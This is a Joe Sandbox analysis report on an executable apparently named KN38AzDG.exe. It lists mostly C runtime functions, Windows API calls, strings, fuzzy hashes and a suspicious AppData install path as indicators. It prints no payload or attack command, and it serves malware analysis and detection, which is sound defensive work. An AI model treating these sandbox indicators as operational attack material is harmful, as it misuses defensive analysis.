Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 12d49d0ebb405d7841363e413113ad543f10426ee6fcdd62e4ed8b0e43bf41ce
Instruction ID: 70158e75b3cbd56bb5c5a37d844b49595fbb4ea3fab6d81f9d8926b701ce9d44
Opcode Fuzzy Hash: 12d49d0ebb405d7841363e413113ad543f10426ee6fcdd62e4ed8b0e43bf41ce
Instruction Fuzzy Hash: 48E02231200221E7E62137669C00B9B3A4CAF657B0F110230FCDBE65D0CFE0DC2082E4

Uniqueness

Uniqueness Score: -1.00%

Function 00101000 Relevance: 1.3, APIs: 1, Instructions: 4
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00002710), ref: 00101005

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 14fdc2a83b2b2268acc20a38079b7d369ddd1f9acca81c20fbd41037dc74802c
Instruction ID: 2aef8a7f22cf7a58bb8276a80da45f130bea8ea8886611794e7ead74d1558169
Opcode Fuzzy Hash: 14fdc2a83b2b2268acc20a38079b7d369ddd1f9acca81c20fbd41037dc74802c
Instruction Fuzzy Hash: 47A0023525510486D60057745C0DB062594BF5870AF52CD21B586C84D9DBD040A0E961

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001016F5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00101701
IsDebuggerPresent.KERNEL32 ref: 001017CD
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001017ED
UnhandledExceptionFilter.KERNEL32(?), ref: 001017F7

Strings

`VhvPPhv, xrefs: 001017CD
Pdhv, xrefs: 001017ED

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID: Pdhv$`VhvPPhv
API String ID: 254469556-1390380883
Opcode ID: 62c33ba656e40a6706ee0b1d4177f39da84d411d2ec6f356b0646e8fb9ef746c
Instruction ID: bf3bdb879f40949c454a4827038b8469af599bc03aa30051ca1c474f1861d2b5
Opcode Fuzzy Hash: 62c33ba656e40a6706ee0b1d4177f39da84d411d2ec6f356b0646e8fb9ef746c
Instruction Fuzzy Hash: 67310775D01218EBDB11DFA4D989BCDBBB8AF08304F1041AAE449AB290EBB45B85DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00104362 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0010445A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00104464
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00104471

Strings

`VhvPPhv, xrefs: 0010445A
Pdhv, xrefs: 00104464

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: Pdhv$`VhvPPhv
API String ID: 3906539128-1390380883
Opcode ID: 789ce76b5115f8efb7bb43aa2572edffb6b9b6865e2bf390de7249bb6f899513
Instruction ID: ef5738dbf35fc21470cdb38cea722467ede7fb5b2c09f06c028c4bfd15d19240
Opcode Fuzzy Hash: 789ce76b5115f8efb7bb43aa2572edffb6b9b6865e2bf390de7249bb6f899513
Instruction Fuzzy Hash: CA31C47490122CABDB21DF64D98978DBBB8BF18350F6042EAF44CA6290E7749F85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 001064AA Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 001064EE

Part of subcall function 00106015: _free.LIBCMT ref: 00106032
Part of subcall function 00106015: _free.LIBCMT ref: 00106044
Part of subcall function 00106015: _free.LIBCMT ref: 00106056
Part of subcall function 00106015: _free.LIBCMT ref: 00106068
Part of subcall function 00106015: _free.LIBCMT ref: 0010607A
Part of subcall function 00106015: _free.LIBCMT ref: 0010608C
Part of subcall function 00106015: _free.LIBCMT ref: 0010609E
Part of subcall function 00106015: _free.LIBCMT ref: 001060B0
Part of subcall function 00106015: _free.LIBCMT ref: 001060C2
Part of subcall function 00106015: _free.LIBCMT ref: 001060D4
Part of subcall function 00106015: _free.LIBCMT ref: 001060E6
Part of subcall function 00106015: _free.LIBCMT ref: 001060F8
Part of subcall function 00106015: _free.LIBCMT ref: 0010610A

_free.LIBCMT ref: 001064E3

Part of subcall function 0010463B: HeapFree.KERNEL32(00000000,00000000,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?), ref: 00104651
Part of subcall function 0010463B: GetLastError.KERNEL32(?,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?,?), ref: 00104663

_free.LIBCMT ref: 00106505
_free.LIBCMT ref: 0010651A
_free.LIBCMT ref: 00106525
_free.LIBCMT ref: 00106547
_free.LIBCMT ref: 0010655A
_free.LIBCMT ref: 00106568
_free.LIBCMT ref: 00106573
_free.LIBCMT ref: 001065AB
_free.LIBCMT ref: 001065B2
_free.LIBCMT ref: 001065CF
_free.LIBCMT ref: 001065E7

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e4bfa634980082c71fe4a2c73f1bbe987b84f0e623f3e6dc6663e052f3e0aeae
Instruction ID: be0da02b4da4338f1a5cdfda28983e980465c0eda0ceaee6e572dbcc3bf71c12
Opcode Fuzzy Hash: e4bfa634980082c71fe4a2c73f1bbe987b84f0e623f3e6dc6663e052f3e0aeae
Instruction Fuzzy Hash: E2319EB16002019FEB20AA38DD85B5A77E8AF11750F108829F5D5D71D6EFB2FCA0CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00103FF8 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 0010400E

Part of subcall function 0010463B: HeapFree.KERNEL32(00000000,00000000,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?), ref: 00104651
Part of subcall function 0010463B: GetLastError.KERNEL32(?,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?,?), ref: 00104663

_free.LIBCMT ref: 0010401A
_free.LIBCMT ref: 00104025
_free.LIBCMT ref: 00104030
_free.LIBCMT ref: 0010403B
_free.LIBCMT ref: 00104046
_free.LIBCMT ref: 00104051
_free.LIBCMT ref: 0010405C
_free.LIBCMT ref: 00104067
_free.LIBCMT ref: 00104075

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a0ae0d4d8aadedadd64ecf1695d054bdd534e958852a3b79874a3835e583027d
Instruction ID: 34884320cb3e2ea29a120d63b1aa297ebbd675fb9916a00adcc658dc359e8aa8
Opcode Fuzzy Hash: a0ae0d4d8aadedadd64ecf1695d054bdd534e958852a3b79874a3835e583027d
Instruction Fuzzy Hash: 8921BAB6900108AFCB01EF94C9C1DDE7BB8BF18744F408165F6559B1A2EB72EA45CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00101BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 00101BF7
___except_validate_context_record.LIBVCRUNTIME ref: 00101BFF
_ValidateLocalCookies.LIBCMT ref: 00101C88
__IsNonwritableInCurrentImage.LIBCMT ref: 00101CB3
_ValidateLocalCookies.LIBCMT ref: 00101D08

Strings

csm, xrefs: 00101C9D

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 91df656b67047768b271e84e171a02a4cb66d17757eeb41376d3383a206425ff
Instruction ID: 6196cf32ee22af1a6c870620095020ccf1b44fd42d352c558ad5c0970e4aa6a4
Opcode Fuzzy Hash: 91df656b67047768b271e84e171a02a4cb66d17757eeb41376d3383a206425ff
Instruction Fuzzy Hash: 2641E234A00208EBDF14DF68C884AAEBBB5EF45324F148155F8949B3D2D7B9EA55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00106815 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 00106880
api-ms-, xrefs: 0010686C

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 339ea10298ff652c6b8c31d0a4e2627f37c92e3dd3c16ca9898517ea34582a65
Instruction ID: 1a66185cce6ee65a9a418f6f5ec28ec803c9f8cc270bd2262ae60399c4fe2de5
Opcode Fuzzy Hash: 339ea10298ff652c6b8c31d0a4e2627f37c92e3dd3c16ca9898517ea34582a65
Instruction Fuzzy Hash: FF21E771E01324EBDB255B649C85A1A3758AF11770F254222FDD5A72D4DBF0ED10C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 001061B4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0010617C: _free.LIBCMT ref: 001061A1

_free.LIBCMT ref: 00106202

Part of subcall function 0010463B: HeapFree.KERNEL32(00000000,00000000,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?), ref: 00104651
Part of subcall function 0010463B: GetLastError.KERNEL32(?,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?,?), ref: 00104663

_free.LIBCMT ref: 0010620D
_free.LIBCMT ref: 00106218
_free.LIBCMT ref: 0010626C
_free.LIBCMT ref: 00106277
_free.LIBCMT ref: 00106282
_free.LIBCMT ref: 0010628D

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 133ea2b89444c130765e51dc6ef272bab715d3be83394f254edc6edf343bbe22
Instruction ID: 7bbf4f47b125503868bb0d6df2a21d489be532bb87d1ae36a647363ae94d1485
Opcode Fuzzy Hash: 133ea2b89444c130765e51dc6ef272bab715d3be83394f254edc6edf343bbe22
Instruction Fuzzy Hash: 0811EA71540B44ABD621B7B0CC46FCB77B86F6A700F404815B2D9660D3EBFAB51487D0

Uniqueness

Uniqueness Score: -1.00%

Function 0010860C Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 00108654
__fassign.LIBCMT ref: 00108839
__fassign.LIBCMT ref: 00108856
WriteFile.KERNEL32(?,001071BC,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0010889E
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001088DE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00108986

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: fba86537a8b509765c408c44dec5bc6235848414ffd95f4bc4db3b0a4b5d0f38
Instruction ID: 7df91e6e73e1884d85151c8d38bcd82cb11b7e794de5493d5a7dfbde9a11dce6
Opcode Fuzzy Hash: fba86537a8b509765c408c44dec5bc6235848414ffd95f4bc4db3b0a4b5d0f38
Instruction Fuzzy Hash: C3C1AC75D04259DFCB15CFA8C8809EDFBB5AF58304F28816AE895FB281DB719942CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00102191 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00102188,00101E5F,001018D9), ref: 0010219F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001021AD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001021C6
SetLastError.KERNEL32(00000000,00102188,00101E5F,001018D9), ref: 00102218

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e085cf5b7614b0191456dd65706b60f3cbf1d4d932cf59053ee1b14cda313802
Instruction ID: 26927af2db6716fec1e4d85ac98e8dc0403d9a654263ea3e07bb3c52a5a6330c
Opcode Fuzzy Hash: e085cf5b7614b0191456dd65706b60f3cbf1d4d932cf59053ee1b14cda313802
Instruction Fuzzy Hash: D901D8326083116EE62937F4BC8DA666B56DB39374720432AF5A0944E1EFF14C909540

Uniqueness

Uniqueness Score: -1.00%

Function 00104EA7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe, xrefs: 00104EAC

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe
API String ID: 0-2800082724
Opcode ID: 678b05b80e5439e868206a1ab5d5c04c9a9050b26666a915612f1a4458b6349c
Instruction ID: b64e7e0337c3f0ed8bc15eb4084f0caaecb8072a39c6e6402094aa66ebb4e16d
Opcode Fuzzy Hash: 678b05b80e5439e868206a1ab5d5c04c9a9050b26666a915612f1a4458b6349c
Instruction Fuzzy Hash: 4C21B0F260420ABFDB10AF79CCC196B776DEB593687118614FA95971D1E7B0EC008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00102303 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,001023C4,?,?,00112C14,00000000,?,001024EF,00000004,InitializeCriticalSectionEx,0010CBF4,InitializeCriticalSectionEx,00000000), ref: 00102393

Strings

api-ms-, xrefs: 00102353

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 5a21995ef6d0aa5310980b44c0c700e2ba44356d62c65853079a062c32c4b4f2
Instruction ID: ea812344a2a8e096dc060d7bec7c818ec8a75ba0c9cd7c94260bfc10b4085028
Opcode Fuzzy Hash: 5a21995ef6d0aa5310980b44c0c700e2ba44356d62c65853079a062c32c4b4f2
Instruction Fuzzy Hash: CA119135A01721EBDF324B689C49B5933A4BB0A7A0F250310F995EF2C4D7F8ED008AD1

Uniqueness

Uniqueness Score: -1.00%

Function 00103431 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00103426,?,?,001033EE,?,?,?), ref: 00103446
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00103459
FreeLibrary.KERNEL32(00000000,?,?,00103426,?,?,001033EE,?,?,?), ref: 0010347C

Strings

CorExitProcess, xrefs: 00103451
mscoree.dll, xrefs: 0010343F

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3ded4735d63bc325bd3b8c846da21b521df7150557e58f406f116fcbb5944228
Instruction ID: fc816894699c4c8538216082862157325aed16c57d1a750032363d6d0e9ff1e6
Opcode Fuzzy Hash: 3ded4735d63bc325bd3b8c846da21b521df7150557e58f406f116fcbb5944228
Instruction Fuzzy Hash: E4F0FE35500219FBDB129B50DD09B9E7A68AB04755F148255B885E51E0CBF08F44EED0

Uniqueness

Uniqueness Score: -1.00%

Function 00106113 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0010612B

Part of subcall function 0010463B: HeapFree.KERNEL32(00000000,00000000,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?), ref: 00104651
Part of subcall function 0010463B: GetLastError.KERNEL32(?,?,001061A6,?,00000000,?,?,?,001061CD,?,00000007,?,?,00106641,?,?), ref: 00104663

_free.LIBCMT ref: 0010613D
_free.LIBCMT ref: 0010614F
_free.LIBCMT ref: 00106161
_free.LIBCMT ref: 00106173

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5f11b3e9a3b9c2430594033e5f2cdfa280c21a2781e7a8af207bf9b6c4c6f22b
Instruction ID: 3db8650896a9406b97a267b7754c752da6334aaf4d3c6b081704ca5520e11409
Opcode Fuzzy Hash: 5f11b3e9a3b9c2430594033e5f2cdfa280c21a2781e7a8af207bf9b6c4c6f22b
Instruction Fuzzy Hash: 63F096F2500240A7C624DB64FAC6C5A73E9AB44B107548809F5C4D79D2DBB1FCD0C654

Uniqueness

Uniqueness Score: -1.00%

Function 0010482B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001049C5

Strings

*?, xrefs: 0010486E

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 76b620e72b1dbb4dfcec853c55e4519de0bd11c3334c3aa31fb4d74e4a998a5d
Instruction ID: 45513eb2ffb848126b622c556d4817efdadb5c07bb394f878a1865f1d592d9c2
Opcode Fuzzy Hash: 76b620e72b1dbb4dfcec853c55e4519de0bd11c3334c3aa31fb4d74e4a998a5d
Instruction Fuzzy Hash: EB614EB5E002199FDB14CFA8C8815EEFBF5EF58314B24816AE985F7340D7B1AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 0010473F Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00104D61: _free.LIBCMT ref: 00104D6F

Part of subcall function 00105935: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,001071BC,00108F94,0000FDE9,00000000,?,?,?,00108D0D,0000FDE9,00000000,?), ref: 001059E1

GetLastError.KERNEL32 ref: 001047A7
__dosmaperr.LIBCMT ref: 001047AE
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 001047ED
__dosmaperr.LIBCMT ref: 001047F4

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306810762.0000000000114000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_100000_KN38AzDG.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: dc6826db255f70a9b06bc6fd3fdffa81beb1ed8766fc161171815beb5e3038be
Instruction ID: f6e82e88204e71b10e109c70732c820a6570ebd582b92aff9c50e46aad12b144
Opcode Fuzzy Hash: dc6826db255f70a9b06bc6fd3fdffa81beb1ed8766fc161171815beb5e3038be
Instruction Fuzzy Hash: 1D21C8F1600709AFDB20AFA58CC192BB7ADFF253687108619FB95971D1E7B0EC518B90

Uniqueness

Uniqueness Score: -1.00%

Function 00104110 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00108A54,?,00000001,0010722D,?,00108F0E,00000001,?,?,?,001071BC,?,?), ref: 00104115
_free.LIBCMT ref: 00104172
_free.LIBCMT ref: 001041A8
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00108F0E,00000001,?,?,?,001071BC,?,?,?,00111298,0000002C,0010722D), ref: 001041B3

Memory Dump Source

Source File: 00000006.00000002.306781386.0000000000101000.00000020.00000001.01000000.00000009.sdmp, Offset: 00100000, based on PE: true

Associated: 00000006.00000002.306774023.0000000000100000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306791835.000000000010C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.306805963.0000000000112000.00000004.00000001.01000000.00000009.sdmpDownload File
